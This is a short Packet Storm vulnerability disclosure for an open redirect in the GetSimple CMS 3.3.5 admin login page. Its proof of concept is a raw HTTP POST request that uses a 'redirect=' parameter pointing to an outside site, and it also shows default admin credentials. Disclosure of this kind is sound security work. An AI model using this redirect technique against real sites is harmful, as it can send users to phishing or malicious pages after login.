GetSimple CMS version 3.3.5 suffers from an open redirection vulnerability.
fe268ea6719cc22c2208a18c4acf1b9d327f1224bac515f7193384e4c28384b3[+] Exploit Title: GetSimple CMS Open Redirect Vulnerability
[+] Google Dork: N/A
[+] Date: 10/8/2015
[+] Exploit Author: Arash Khazaei
[+] Vendor Homepage: http://get-simple.info/
[+] Software Link: http://get-simple.info/download/last
[+] Version: 3.3.5
[+] Tested on: Kali / Mozilla FireFox, Windows / Google Chrome
[+] CVE : N/A
[+] Contacts: 0xclay@gmail.com
[+] https://twitter.com/0xClay
===============================
Introduction :
GetSimple CMS Is A Content Management System Licensed Under GPL V3 And
Coded In PHP.
A Vulnerability In GetSimple CMS 3.3.5 Allow Open Redirect In CMS Admin
Page
===============================
POC:
POST /simple/admin/index.php?redirect=http://google.com/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101
Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/simple/admin/index.php?redirect=http://google.com/
Cookie: __atuvc=16%7C32; GS_ADMIN_USERNAME=admin;
91ec5ca03662725405ead7f97487b5ccd54ec2c2=a35fa371ed9c8b41dde3ab08a553a6c391eb237f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
userid=admin&pwd=admin&submitted=Login
# Vulnerable Input Is => /admin/index.php?redirect=http://google.com/
after login to CMS Will Be Redirectd To Google :)
Discovered By : Arash Khazaei .
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed